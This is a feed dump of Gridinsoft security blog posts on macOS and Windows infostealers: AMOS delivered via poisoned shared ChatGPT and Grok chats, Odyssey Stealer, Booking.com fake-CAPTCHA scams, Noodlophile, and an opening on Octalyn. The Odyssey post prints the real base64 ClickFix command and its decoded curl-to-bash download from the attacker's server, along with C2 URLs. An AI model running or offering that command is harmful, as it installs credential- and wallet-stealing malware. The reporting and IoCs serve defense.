Stealer – Gridinsoft Blog https://gridinsoft.com/blogs Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Thu, 11 Dec 2025 21:18:37 +0000 en-US hourly 1 https://wordpress.org/?v=6.9 AI Chats Are Delivering AMOS Stealer Through Google Search Results https://gridinsoft.com/blogs/amos-stealer-ai-poisoning-chatgpt-grok/ https://gridinsoft.com/blogs/amos-stealer-ai-poisoning-chatgpt-grok/#respond Thu, 11 Dec 2025 21:18:37 +0000 https://gridinsoft.com/blogs/?p=31409 Here’s a novel malware delivery vector that nobody saw coming. Attackers are weaponizing publicly shared conversations with AI assistants like ChatGPT and Grok to deliver the AMOS stealer to Mac users. The kicker? These poisoned AI chats are ranking at the top of Google search results for completely innocent queries like “How to free up […]

The post AI Chats Are Delivering AMOS Stealer Through Google Search Results appeared first on Gridinsoft Blog.

]]>
Here’s a novel malware delivery vector that nobody saw coming. Attackers are weaponizing publicly shared conversations with AI assistants like ChatGPT and Grok to deliver the AMOS stealer to Mac users. The kicker? These poisoned AI chats are ranking at the top of Google search results for completely innocent queries like “How to free up disk space on Mac”.

What you thought was helpful advice from your trusted silicon friend turns out to be a credential-stealing trap. Life definitely did not prepare regular users for this one.

On December 5, 2025, Huntress researchers investigated an Atomic macOS Stealer (AMOS Stealer) alert with an unusual origin. No phishing email. No malicious installer. No right-click-to-bypass-Gatekeeper shenanigans. The victim had simply searched Google for “Clear disk space on macOS.”

At the top of results sat two highly-ranked links—one to a ChatGPT conversation, another to a Grok chat. Both platforms are legitimate. Both conversations looked authentic, with professional formatting, numbered steps, even reassuring language like “safely removes” and “does not touch your personal data.”

How to clear disk space? - AMOS Stealer
How to clear disk space – AI Chats Are Delivering AMOS Stealer

But instead of legitimate cleanup instructions—surprise, surprise—it was a ClickFix-style attack. To the average user, the whole thing looks absolutely convincing: why wouldn’t you trust Google and your AI assistant? They surely won’t let you down.

Grok’s version at least displays a banner warning about custom instructions—but that means nothing to someone who just wants to clear their disk space.

Huntress confirmed this isn’t a one-off case. They reproduced poisoned results for “how to clear data on iMac,” “clear system data on iMac,” and “free up storage on Mac.” Multiple AI conversations are surfacing organically through standard search terms, each pointing victims toward the same multi-stage macOS stealer. This is a coordinated SEO poisoning campaign.

Traditional malware delivery requires users to fight their instincts: allow unknown files, bypass Gatekeeper, click through security warnings. This attack? It just needs you to search, click a trusted-looking result, and paste a command into Terminal. No downloads. No warnings. No red flags.

Users aren’t being careless—they’re following what appears to be legitimate advice from a trusted AI platform, served up by a search engine they use daily, for a task that actually does involve Terminal commands. The attack exploits trust in search engines, trust in AI platforms (chatgpt.com and grok.com are real domains everyone knows), trust in the familiar ChatGPT formatting, and the normalized behavior of copying Terminal commands from authoritative sources.

What AMOS Stealer Actually Does

Once executed, the malware kicks off a multi-stage infection. First, it prompts for your “System Password” via a fake dialog—not even the real macOS authentication UI—and silently validates it using Directory Services. Then it uses that password with sudo to gain root access.

For persistence, it drops a hidden .helper binary and a LaunchDaemon that respawns the malware every second if killed. If you have Ledger Wallet or Trezor Suite installed, it overwrites them with trojanized versions designed to steal your seed phrases. Finally, it exfiltrates browser credentials, cookies, Keychain data, and cryptocurrency wallets from Electrum, Exodus, MetaMask, Coinbase, and more.

The password prompt doesn’t even look like macOS—it’s just a script asking politely for your password. And people enter it anyway, because they trust where the instructions came from.

ClickFix Keeps Getting Creative

This campaign adds another impressive example to the ClickFix portfolio. The technique has evolved from fake CAPTCHA prompts and browser updates to now exploiting our relationship with AI assistants. Malware no longer needs to masquerade as legitimate software—it just needs to masquerade as help.

All of this is fascinating from a security research perspective, but honestly, you have to feel sorry for regular users—nobody prepared them for their trusted search engine and AI assistant teaming up against them.

The post AI Chats Are Delivering AMOS Stealer Through Google Search Results appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/amos-stealer-ai-poisoning-chatgpt-grok/feed/ 0
Odyssey Stealer: Russian ‘Love Trump’ Malware Replaces Ledger Live Crypto Wallet App https://gridinsoft.com/blogs/odyssey-stealer-macos-malware/ https://gridinsoft.com/blogs/odyssey-stealer-macos-malware/#respond Wed, 11 Jun 2025 03:13:58 +0000 https://gridinsoft.com/blogs/?p=31095 A new macOS malware campaign is targeting users through social engineering, masquerading as legitimate Cloudflare security verification. The Odyssey Stealer represents a significant escalation in Mac-targeted cybercrime, combining deceptive web pages with AppleScript-based data theft capabilities. Analysis of the malware reveals intriguing geopolitical elements, with persistence mechanisms using file names like com.love.russia.plist and staging directories […]

The post Odyssey Stealer: Russian ‘Love Trump’ Malware Replaces Ledger Live Crypto Wallet App appeared first on Gridinsoft Blog.

]]>
A new macOS malware campaign is targeting users through social engineering, masquerading as legitimate Cloudflare security verification. The Odyssey Stealer represents a significant escalation in Mac-targeted cybercrime, combining deceptive web pages with AppleScript-based data theft capabilities.

Analysis of the malware reveals intriguing geopolitical elements, with persistence mechanisms using file names like com.love.russia.plist and staging directories named lovemrtrump – suggesting potential connections to Russian threat actors with apparent political motivations. Most concerning is the malware’s ability to replace legitimate cryptocurrency applications like Ledger Live with trojaned versions, compromising hardware wallet security and stealing private keys during transactions.

The Deception Chain: From Fake Verification to Full Compromise

The attack begins when users are redirected to seemingly legitimate domains like macosx-apps[.]com (macosxappstore[.]com, appmacosx[.]com) displaying convincing Cloudflare-styled verification pages. These pages present users with an “Unusual Web Traffic Detected” warning and request manual verification through terminal commands.

macosx-apps - Fake Cloudflare verification page
macosx-apps – Fake Cloudflare verification page

The fake verification page instructs users to:

  1. Press Command + Space to open Spotlight
  2. Type “Terminal” and press Return
  3. Copy and paste a provided command
  4. Execute the command to “verify” their legitimacy

What appears to be a simple verification text is actually a base64-encoded malicious command: echo "Y3VybCAtcyBodHRwOi8vb2R5c3NleTEudG86MzMzMy9kP3U9b2N0b2JlciB8IG5vaHVwIGJhc2ggJg==" | base64 -d | bash

When decoded, this reveals the true payload: curl -s hxxp[:]//odyssey1[.]to:3333/d?u=october | nohup bash & – a command that downloads and executes an AppleScript stealer from the attacker’s server.

Odyssey Stealer Attack Flow User Redirected to macosx-apps.com, macosxappstore.com, appmacosx.com fake Cloudflare page Fake Verification “Unusual Traffic” Terminal Instructions Base64 Command User copies and executes in Terminal Script Download from odyssey1[.]to:3333 AppleScript Payload Data Collection Browser credentials, wallets, system info Data Exfiltration ZIP upload to odyssey1[.]to server Persistence Setup LaunchDaemon com.love.russia.plist App Replacement Malicious Ledger Live installation Ongoing Control Botnet binary execution loop High Risk: Complete system compromise, credential theft, crypto wallet access Persistence: Survives reboots, runs continuously, replaces legitimate applications Detection: Monitor /tmp/lovemrtrump/, network connections to odyssey1[.]to, LaunchDaemon processes

Advanced AppleScript Capabilities: Beyond Basic Info-Stealing

The Odyssey Stealer distinguishes itself through obfuscation and comprehensive data collection capabilities. The malware employs randomized function names (like f7220708984353234618 and v4763105019481279311) to evade signature-based detection while systematically harvesting sensitive information.

Targeted Data Collection

The stealer focuses on high-value targets across multiple categories:

  • Browser Credentials: Targets Safari, Chrome, Brave, Edge, Vivaldi, Opera, and Firefox, extracting cookies, form history, and stored passwords
  • Cryptocurrency Wallets: Specifically hunts for Electrum, Coinomi, Exodus, Ledger Live, MetaMask, and numerous other wallet applications
  • System Information: Collects detailed hardware and software profiles using system_profiler
  • Personal Files: Copies documents from Desktop and Documents folders with extensions like .txt, .pdf, .docx, .wallet, .key
  • Keychain Access: Steals macOS Keychain databases containing stored passwords and certificates
  • Apple Notes: Extracts and formats Notes data, potentially revealing personal information and security details

Persistence and Privilege Escalation

The malware establishes multiple persistence mechanisms to maintain long-term access:

  • LaunchDaemon Installation: Creates /Library/LaunchDaemons/com.love.russia.plist to ensure automatic execution at boot
  • Botnet Binary: Downloads and installs a secondary payload (~/.init) that runs continuously
  • Social Engineering for Sudo: Prompts users with fake “Application Helper” dialogs to obtain administrator passwords
  • Application Replacement: Can replace legitimate applications like Ledger Live with malicious versions

Technical Analysis: Obfuscation and Anti-Detection

The Odyssey Stealer demonstrates anti-analysis techniques that set it apart from typical commodity info-stealers like Lumma. Unlike traditional malware that relies on compiled binaries, this threat leverages AppleScript’s legitimate system access to fly under the radar.

Key Technical Features

Component Function Impact
Variable Obfuscation Random 19-digit function/variable names Evades signature detection
Error Handling Comprehensive try-catch blocks Prevents crashes, maintains stealth
File Exclusions Skips .DS_Store, Cache, temp files Reduces detection, optimizes exfiltration
Cleanup Routines Removes temporary files post-exfiltration Eliminates forensic evidence
Retry Mechanism 10 upload attempts with 60s delays Ensures successful data theft

Cryptocurrency Focus: The Primary Target

Like many modern stealers, Odyssey specifically targets cryptocurrency assets with precision similar to Meta Infostealer campaigns. The malware maintains an extensive list of over 180 browser extension IDs for cryptocurrency wallets and DeFi applications.

High-priority targets include:

  • MetaMask: The most common Ethereum wallet extension
  • BNB Chain Wallet: Binance Smart Chain access
  • Hardware Wallet Interfaces: Ledger Live, Trezor Suite
  • Desktop Wallets: Electrum, Exodus, Atomic Wallet
  • Exchange Applications: Binance desktop, TonKeeper

The malware’s application replacement capability is particularly concerning. When enabled, it can download and install malicious versions of legitimate applications like Ledger Live, potentially compromising hardware wallet interactions and stealing private keys during transactions.

The Ledger Live Trojan: Hardware Wallet Compromise

One of the most dangerous features of Odyssey Stealer is its ability to replace the legitimate Ledger Live application with a malicious version. This supply-chain attack works by:

  • Application Termination: Killing any running Ledger Live processes
  • File Replacement: Removing the legitimate /Applications/Ledger Live.app
  • Malicious Installation: Downloading and installing a trojaned version from hxxp[:]//odyssey1[.]to/otherassets/ledger.zip
  • Seamless Operation: The fake application appears identical to users while capturing private keys and transaction data

This attack vector is particularly insidious because users trust hardware wallets like Ledger devices for their enhanced security. However, if the companion software is compromised, attackers can potentially intercept private keys, seed phrases, and transaction details even from hardware-secured wallets. The trojaned Ledger Live app could capture sensitive information during device setup, firmware updates, or transaction signing processes.

Indicators of Compromise (IoCs)

Network Indicators

  • C2 Server: odyssey1[.]to:3333
  • Download URL: hxxp[:]//odyssey1[.]to:3333/d?u=october
  • Fake Domain: macosx-apps[.]com, macosxappstore[.]com, appmacosx[.]com
  • Asset Download: hxxp[:]//odyssey1[.]to/otherassets/ledger.zip
  • Botnet Binary: hxxp[:]//odyssey1[.]to/otherassets/botnet

File System Artifacts

  • Staging Directory: /tmp/lovemrtrump/
  • Exfiltration Archive: /tmp/out.zip
  • Persistence: /Library/LaunchDaemons/com.love.russia.plist
  • User Files: ~/.username, ~/.pwd, ~/.init, ~/.start
  • Data Collection: /tmp/lovemrtrump/finder/, /tmp/lovemrtrump/deskwallets/

Detection and Removal Guide

If you suspect your Mac has been compromised by Odyssey Stealer, immediate action is required to prevent ongoing data theft and financial losses.

Immediate Detection Steps

  1. Check for Active Processes:
            ps aux | grep -E "(odyssey|lovemrtrump|\.init)"
            launchctl list | grep "com.love.russia"
            
  2. Inspect File System:
            ls -la /tmp/lovemrtrump/
            ls -la /Library/LaunchDaemons/com.love.russia.plist
            ls -la ~/.init ~/.start ~/.username ~/.pwd
            
  3. Check Network Connections:
            netstat -an | grep "odyssey1"
            lsof -i | grep 3333
            

Manual Removal Process

Warning: Manual removal requires administrative privileges and careful execution. For comprehensive cleanup, we recommend using professional security tools.

  1. Stop Malicious Processes:
            sudo launchctl unload /Library/LaunchDaemons/com.love.russia.plist
            sudo pkill -f "\.init"
            sudo pkill -f "lovemrtrump"
            
  2. Remove Persistence Mechanisms:
            sudo rm -f /Library/LaunchDaemons/com.love.russia.plist
            rm -f ~/.init ~/.start ~/.username ~/.pwd
            
  3. Clean Temporary Files:
            sudo rm -rf /tmp/lovemrtrump/
            sudo rm -f /tmp/out.zip
            sudo rm -f /tmp/ledger.zip
            sudo rm -f /tmp/starter
            
  4. Verify Application Integrity:
            # Check if Ledger Live was replaced
            ls -la "/Applications/Ledger Live.app"
            # Reinstall from official source if suspicious
            

Post-Infection Security Measures

After removing the malware, implement these critical security steps:

Immediate Actions

  • Change All Passwords: Update passwords for all accounts, especially financial and cryptocurrency services
  • Review Financial Accounts: Check bank statements, credit reports, and cryptocurrency wallet balances
  • Enable 2FA: Activate two-factor authentication on all sensitive accounts
  • Monitor Credit Reports: Set up fraud alerts with credit bureaus

Browser Security

  • Clear Browser Data: Remove all saved passwords, cookies, and form data
  • Reinstall Extensions: Remove and reinstall all browser extensions, especially wallet-related ones
  • Update Browsers: Ensure all browsers are running the latest versions
  • Review Permissions: Audit browser extension permissions and remove unnecessary access

Cryptocurrency Security

  • Create New Wallets: Generate new wallet addresses and transfer funds from potentially compromised wallets
  • Hardware Wallet Reset: If using hardware wallets, perform a full reset and restore from backup
  • Verify Applications: Reinstall all cryptocurrency applications from official sources
  • Monitor Transactions: Set up alerts for all cryptocurrency accounts and monitor for unauthorized activity

The Broader Threat Landscape

The Odyssey Stealer represents a concerning evolution in macOS-targeted cybercrime. Unlike previous campaigns that relied on social engineering or software vulnerabilities, this threat combines legitimate system tools with deception to bypass traditional security measures.

This attack shares characteristics with other recent campaigns targeting Mac users, including RustBucket malware and various cross-platform stealers. The trend toward AppleScript-based attacks suggests cybercriminals are adapting their tactics to exploit macOS users’ trust in system dialogs and terminal commands.

The campaign’s focus on cryptocurrency theft aligns with broader industry trends. As traditional banking security improves, attackers increasingly target decentralized finance (DeFi) platforms and personal cryptocurrency holdings, which often lack the same fraud protection mechanisms as traditional financial institutions.

Geopolitical Implications: The Russia Connection

The malware’s internal artifacts reveal potential geopolitical motivations. The persistence mechanism installs itself as com.love.russia.plist in the system’s LaunchDaemons directory, while staging stolen data in a folder named lovemrtrump. These naming conventions suggest the campaign may originate from Russian-affiliated threat actors with apparent political sentiments targeting Western cryptocurrency users.

The combination of Russian nomenclature and cryptocurrency theft capabilities aligns with patterns observed in other state-sponsored or politically motivated cybercrime operations. The specific targeting of hardware wallet applications like Ledger Live suggests a deep understanding of Western cryptocurrency infrastructure and user behavior patterns.

Conclusion

The Odyssey Stealer’s distinctive characteristics – from its Russian-themed persistence mechanisms (com.love.russia.plist, lovemrtrump directories) to its specific targeting of hardware wallet applications like Ledger Live – suggest a coordinated campaign with potential geopolitical motivations. The ability to replace legitimate cryptocurrency applications with trojaned versions represents a particularly dangerous evolution in crypto-targeted malware, as it undermines the security assumptions users make about hardware wallet safety.

Mac users must remain vigilant against these evolving threats, particularly those involving terminal commands or system-level access requests. The Ledger Live trojan functionality is especially concerning, as it targets users who have invested in hardware security solutions, potentially compromising their most secure cryptocurrency storage methods.

As cryptocurrency adoption continues to grow, we can expect similar campaigns targeting wallet applications and blockchain-related services. The key to protection lies in maintaining skepticism toward unsolicited security prompts, implementing comprehensive security measures, and regularly verifying the integrity of cryptocurrency applications. Users should always download applications directly from official sources and be suspicious of any unexpected application updates or reinstallation requests.

The Odyssey Stealer serves as a stark reminder that the intersection of geopolitics and cybercrime continues to evolve, with threat actors leveraging technical capabilities to target high-value cryptocurrency assets while potentially advancing broader political agendas.

Odyssey Stealer: Russian ‘Love Trump’ Malware Replaces Ledger Live Crypto Wallet App

The post Odyssey Stealer: Russian ‘Love Trump’ Malware Replaces Ledger Live Crypto Wallet App appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/odyssey-stealer-macos-malware/feed/ 0
Cybercriminal campaign exploiting Booking.com https://gridinsoft.com/blogs/cybercriminal-exploiting-booking-com/ https://gridinsoft.com/blogs/cybercriminal-exploiting-booking-com/#respond Mon, 09 Jun 2025 20:28:55 +0000 https://gridinsoft.com/blogs/?p=31087 Cybercriminals are running a two-pronged attack targeting both travelers and hotel staff through the Booking.com platform, according to security research and incident reports from affected organizations. The campaign hits travelers by compromising hotel booking systems to steal money, while targeting hotel staff with fake CAPTCHA websites that install malware. The attack exploits trust in booking […]

The post Cybercriminal campaign exploiting Booking.com appeared first on Gridinsoft Blog.

]]>
Cybercriminals are running a two-pronged attack targeting both travelers and hotel staff through the Booking.com platform, according to security research and incident reports from affected organizations.

The campaign hits travelers by compromising hotel booking systems to steal money, while targeting hotel staff with fake CAPTCHA websites that install malware. The attack exploits trust in booking platforms.

How the Traveler Scam Actually Works

Security researchers documented a case involving Robert Woodford, a recruitment marketing specialist who got burned while booking a hotel in Verona through Booking.com.

After completing a booking, Woodford received what looked like an official message through Booking.com’s messaging system asking for “missing details” and a prepayment. The message appeared in the same thread as his previous hotel communications, and the payment link contained “bookingcom” in the URL.

Here’s the kicker: the hotel’s booking system had been compromised. This gave cybercriminals access to guest data and payment information. They could impersonate hotels using messaging platforms. They communicated directly with customers through official channels and manipulated payment processes within trusted systems.

Woodford logged into Booking.com directly rather than clicking links, but he still found the same fraudulent message in the official system. The payment link appeared legitimate because it contained booking-related terms in the URL structure. He only realized the merchant’s name was incorrect after making the payment.

Meanwhile, Hotel Staff Get Hit Too

While travelers are getting scammed, cybercriminals are hitting hospitality staff with fake Booking.com emails and CAPTCHA websites.

Hotel staff receive convincing fake Booking.com emails about new reservations. The emails contain booking details with check-in dates just days away, creating urgency. Staff are told to copy and paste a URL into their browser. The URL leads to a fake CAPTCHA website asking for “verification”. The fake verification tells users to press Windows Key + R, then Ctrl + V, then Enter. This sequence runs malicious code that infects systems with information stealers or trojans.

Fake CAPTCHA site
Fake CAPTCHA site

The fake CAPTCHA sites use Windows clipboard manipulation to execute PowerShell commands without users realizing what’s happening. The commands download and install malware that can steal browser credentials, cryptocurrency wallet data, and email accounts. This technique exploits the widespread use of fake CAPTCHA sites to spread malware.

Industry Response and Real Incidents

The Swiss National Cyber Security Centre (NCSC) has reported similar attacks where hotel staff were tricked into installing malware through fake CAPTCHAs and malicious clipboard commands.

Arcona Hotels & Resorts, a German company operating leisure and boutique hotels, discovered “technical irregularities” and disconnected several locations from central IT services. They brought in ResponseOne GmbH, an IT forensics specialist, to handle the situation. The company operates properties focusing on leisure and holiday hotels, boutique hotels, and 5-star properties across Germany.

The timing suggests a connection to the broader campaign targeting hospitality infrastructure, though Arcona hasn’t released details about what type of attack they experienced or whether customer data was compromised.

What Makes These Attacks Work

The coordinated nature shows a threat actor with social engineering skills for creating convincing fake booking emails and payment systems. They have technical infrastructure for hosting fake CAPTCHA sites and payment processing systems. They understand how hotels and booking platforms work. They’re targeting multiple hotels and platforms at once.

The attacks exploit trust between hotels, booking platforms, and travelers, turning communication channels into fraud vectors. The attackers use the booking platform’s own messaging system, making detection harder because the communications appear to come from verified sources.

The fake CAPTCHA component targets hotel staff who handle bookings daily and are trained to respond quickly to reservation requests. The urgency created by check-in dates just days away pressures staff to act without verifying the requests through alternate channels.

Why This Matters

These attacks hit the hospitality industry because they compromise trusted booking platforms and create financial losses for hotels and travelers. They damage trust in online booking systems and give attackers access to customer data. The stolen data enables follow-up attacks using credentials.

The two-sided approach lets attackers profit from both ends while maintaining access to compromised systems. Once inside a hotel’s booking system, criminals can monitor future reservations and target additional guests with payment scams.

The hospitality industry processes millions of booking transactions daily, making it a target for cybercriminals seeking financial gain and customer data. Hotels often use integrated systems that connect reservation platforms, payment processing, and customer communications, creating multiple attack surfaces.

If You Think You’re Compromised

Immediately disconnect affected systems from networks to prevent further data exfiltration or lateral movement by attackers. Contact law enforcement and cybersecurity specialists who can help with incident response and forensic analysis.

Notify affected customers and booking platforms about potential data exposure, following breach notification requirements in your jurisdiction. Preserve evidence for forensic analysis by avoiding changes to affected systems until specialists can examine them.

Implement temporary manual processes for critical operations while investigating the extent of the compromise and rebuilding affected systems with updated security controls.

The Technical Details

The fake CAPTCHA websites use domain names that mimic booking platforms and employ HTTPS certificates to appear legitimate. The malicious PowerShell commands typically download additional payloads from command-and-control servers hosted on compromised websites or cloud platforms.

The clipboard manipulation technique works because Windows automatically copies text when users select and copy URLs from emails. The fake CAPTCHA instructions trick users into pasting and executing this content through the Windows Run dialog, bypassing browser security protections.

Information stealers installed through these attacks typically target browser stored passwords, cryptocurrency wallet files, email client credentials, and two-factor authentication backup codes. The stolen data gets sold on darknet markets or used for additional attacks against the victims’ other accounts.

Bottom Line

The coordinated attacks targeting Booking.com users and hospitality staff show how cybercriminal operations are getting more sophisticated. The multi-vector approach demonstrates the evolving nature of these threats.

Both travelers and hospitality organizations need to adapt their security practices. These attacks show the need for verification procedures, staff training, and incident response capabilities.

The hospitality industry faces the challenge of maintaining customer trust while implementing stronger security without compromising user experience. How the industry responds to this campaign may well define cybersecurity standards for travel in the years ahead.

Organizations dealing with similar attacks should consider deploying security solutions like information stealer detection tools and conducting thorough system audits to identify potential compromises.

The post Cybercriminal campaign exploiting Booking.com appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/cybercriminal-exploiting-booking-com/feed/ 0
Noodlophile Stealer: Cybercriminals Hijack AI Hype to Steal Your Data https://gridinsoft.com/blogs/noodlophile-stealer/ https://gridinsoft.com/blogs/noodlophile-stealer/#respond Fri, 30 May 2025 17:58:39 +0000 https://gridinsoft.com/blogs/?p=31068 Just when you thought cybercriminals couldn’t get more creative, they’ve found a way to weaponize our collective obsession with AI. Meet Noodlophile Stealer, a newly discovered information-stealing malware that’s turning the AI revolution into a data theft operation. Because apparently, even malware developers want to ride the artificial intelligence wave. Name Noodlophile Stealer, Noodlophile Malware […]

The post Noodlophile Stealer: Cybercriminals Hijack AI Hype to Steal Your Data appeared first on Gridinsoft Blog.

]]>
Just when you thought cybercriminals couldn’t get more creative, they’ve found a way to weaponize our collective obsession with AI. Meet Noodlophile Stealer, a newly discovered information-stealing malware that’s turning the AI revolution into a data theft operation. Because apparently, even malware developers want to ride the artificial intelligence wave.

Name Noodlophile Stealer, Noodlophile Malware
Threat Type Information Stealer, Remote Access Trojan
Disguise AI video generation platforms, fake content creation tools
What It Steals Browser credentials, cryptocurrency wallets, session tokens, personal files
Distribution Facebook groups (62K+ views), fake AI websites, viral social media campaigns
Communication Telegram bot API for data exfiltration
Additional Payload XWorm 5.2 remote access trojan
Risk Level High (financial loss, account takeover, persistent remote access)

The AI Bait: Too Good to Be True

Security researchers at Morphisec have uncovered a sophisticated campaign that exploits public enthusiasm for AI-powered content creation. Instead of the usual suspects like cracked software or phishing emails, cybercriminals are now building convincing fake AI platforms that promise cutting-edge video and image generation capabilities.

Fake AI platforms that promise cutting-edge video
Fake AI platforms that promise cutting-edge video

The operation starts innocently enough. Victims discover these fake AI platforms through Facebook groups boasting over 62,000 views, where users eagerly share links to “revolutionary” AI tools for video editing and content creation. The social engineering is brilliant in its simplicity: who doesn’t want access to the latest AI technology for free?

How the Scam Works

The attack chain is deceptively straightforward:

  1. Discovery: Users find fake AI platforms through viral Facebook posts and groups
  2. Engagement: Victims upload their images or videos, believing they’re using legitimate AI tools
  3. The Hook: After “processing,” users are prompted to download their enhanced content
  4. The Payload: Instead of AI-generated videos, they download malware disguised as their processed content

The downloaded file typically comes as a ZIP archive with names like “VideoDreamAI.zip” containing an executable masquerading as a video file: “Video Dream MachineAI.mp4.exe”. The filename exploits whitespace and misleading extensions to appear harmless, but it’s actually a sophisticated malware delivery system.

Meet Noodlophile: The New Kid on the Block

Noodlophile Stealer represents a new addition to the malware ecosystem. Previously undocumented in public malware trackers, this trojan combines multiple malicious capabilities:

Data Theft Capabilities

  • Browser credential harvesting from all major browsers
  • Cryptocurrency wallet exfiltration targeting popular wallets
  • Session token theft for account takeover attacks
  • File system reconnaissance to identify valuable data

Communication Method

Like its cousin Octalyn Stealer, Noodlophile uses Telegram bots for data exfiltration. The malware communicates through Telegram’s API, making detection more challenging since the traffic appears legitimate to most monitoring tools.

The XWorm Connection

In many cases, Noodlophile doesn’t work alone. Researchers discovered that the malware often deploys alongside XWorm 5.2, a remote access trojan that provides attackers with deeper system control. This combination creates a particularly dangerous infection that can:

  • Steal credentials and sensitive data (Noodlophile)
  • Maintain persistent remote access (XWorm)
  • Propagate to other systems on the network
  • Deploy additional malware payloads
Noodlophile Attack Flow Facebook Groups 62K+ Views Fake AI Platform Upload Content Download Malware Data Theft via Telegram Noodlophile • Browser Data • Crypto Wallets • Session Tokens XWorm 5.2 • Remote Access • Persistence • Propagation Attack progression from social media to data exfiltration

Noodlophile Stealer attack flow analysis

Technical Analysis: Under the Hood

Security researchers discovered that Noodlophile employs sophisticated obfuscation techniques to evade detection. The malware uses approximately 10,000 repeated instances of meaningless operations (like “1 / int(0)”) to break automated analysis tools while remaining syntactically valid.

Key Technical Indicators

The malware communicates with command-and-control servers through several domains and IP addresses:

  • C2 Domains: lumalabs-dream[.]com, luma-dreammachine[.]com
  • Telegram Integration: Uses bot tokens for data exfiltration
  • XWorm C2: 103.232.54[.]13:25902
  • File Names: Various ZIP archives with AI-themed names

The Vietnamese Connection

Investigation into the malware’s origins suggests the developer is likely of Vietnamese origin, based on language indicators and social media profiles. The threat actor has been observed promoting this “new method” in cybercrime forums, advertising Noodlophile as part of malware-as-a-service (MaaS) schemes alongside tools labeled “Get Cookie + Pass” for account takeover operations.

Noodlophile, likely of Vietnamese origin
Noodlophile, likely of Vietnamese origin

Why This Campaign is Different

What makes this campaign particularly concerning is its exploitation of legitimate technological trends. Unlike traditional malware campaigns that rely on obviously suspicious lures, this operation targets users genuinely interested in AI technology – a demographic that includes creators, small businesses, and tech enthusiasts who might otherwise be security-conscious.

The use of Facebook groups with tens of thousands of views demonstrates the campaign’s reach and sophistication. By leveraging social proof and viral marketing techniques, the attackers have created a self-sustaining distribution network that continues to attract new victims.

Signs of Infection

If you’ve recently downloaded “AI-generated” content from suspicious platforms, watch for these warning signs:

  • Unexpected network activity, especially connections to Telegram servers
  • Browser settings or saved passwords changing unexpectedly
  • Cryptocurrency wallet balances decreasing
  • Unknown processes running with network access
  • Antivirus alerts mentioning Noodlophile or XWorm
  • Unusual system performance or unexpected file modifications

How to Remove Noodlophile Stealer

If you suspect your system is infected with Noodlophile Stealer:

Immediate Actions

  1. Disconnect from the internet to prevent further data exfiltration
  2. Boot into Safe Mode to limit malware functionality
  3. Run a complete system scan with updated anti-malware software
GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Post-Removal Steps

  • Change all passwords immediately, especially for financial and cryptocurrency accounts
  • Enable two-factor authentication on all critical accounts
  • Monitor financial accounts for unauthorized transactions
  • Check cryptocurrency wallets and consider transferring funds to new addresses
  • Review browser extensions and remove any suspicious additions

Prevention: Staying Safe in the AI Era

As AI technology continues to evolve, so will the tactics used to exploit our enthusiasm for it. Here’s how to protect yourself:

Red Flags to Watch For

  • Too-good-to-be-true AI tools offering premium features for free
  • Platforms requiring file uploads before showing capabilities
  • Social media promotion through viral posts rather than official channels
  • Download requirements for viewing “processed” content
  • Executable files disguised as media content

Best Practices

  • Stick to well-known, legitimate AI platforms with verified credentials
  • Be skeptical of AI tools promoted through social media groups
  • Never download executable files when expecting media content
  • Use reputable antivirus software with real-time protection
  • Keep your operating system and browsers updated

The Bigger Picture: AI as the New Attack Vector

The Noodlophile campaign represents a significant shift in cybercriminal tactics. As AI becomes mainstream, we can expect to see more attacks leveraging public interest in artificial intelligence. This trend mirrors how cybercriminals previously exploited interest in cryptocurrency, social media, and mobile apps.

The sophistication of these fake AI platforms – complete with convincing interfaces and viral marketing campaigns – demonstrates that cybercriminals are investing significant resources in this new attack vector. Organizations and individuals need to adapt their security awareness training to address AI-themed threats.

Industry Response

Security vendors are already updating their detection capabilities to identify Noodlophile and similar AI-themed threats. However, the rapid evolution of these campaigns means that user education remains the first line of defense.

The cybersecurity community is also working to identify and take down the infrastructure supporting these campaigns, including the fake domains and social media groups used for distribution.

The Bottom Line

Noodlophile Stealer serves as a wake-up call about the dark side of AI adoption. While artificial intelligence offers incredible opportunities for creativity and productivity, it also provides new avenues for cybercriminals to exploit our enthusiasm and trust.

The key to staying safe is maintaining healthy skepticism, especially when encountering “revolutionary” AI tools that seem too good to be true. Remember: legitimate AI companies don’t typically distribute their software through viral Facebook posts or require you to download suspicious executables.

If you suspect your system has been compromised by Noodlophile or any other malware, don’t wait. Download GridinSoft Anti-Malware and run a complete system scan immediately.

Noodlophile Stealer: Cybercriminals Hijack AI Hype to Steal Your Data

In the age of AI, the old cybersecurity adage remains true: if something seems too good to be true, it probably is. Stay vigilant, stay informed, and remember that the most sophisticated AI tool is still your own critical thinking.

The post Noodlophile Stealer: Cybercriminals Hijack AI Hype to Steal Your Data appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/noodlophile-stealer/feed/ 0
Octalyn Stealer: How This Threat Steals Passwords, Crypto & Browser Data https://gridinsoft.com/blogs/octalyn-stealer/ https://gridinsoft.com/blogs/octalyn-stealer/#respond Fri, 30 May 2025 00:18:56 +0000 https://gridinsoft.com/blogs/?p=31057 Octalyn Stealer is an information-stealing malware that’s currently being promoted on GitHub – because apparently, even cybercriminals believe in open-source development these days. Contrary to initial reports, this malware is actually written in Pascal/Delphi with a user-friendly control panel, making it accessible even to less technically skilled cybercriminals. This isn’t your garden-variety trojan that just […]

The post Octalyn Stealer: How This Threat Steals Passwords, Crypto & Browser Data appeared first on Gridinsoft Blog.

]]>
Octalyn Stealer is an information-stealing malware that’s currently being promoted on GitHub – because apparently, even cybercriminals believe in open-source development these days. Contrary to initial reports, this malware is actually written in Pascal/Delphi with a user-friendly control panel, making it accessible even to less technically skilled cybercriminals. This isn’t your garden-variety trojan that just sits around looking menacing. It’s designed with one clear purpose: to systematically extract and exfiltrate your sensitive data.

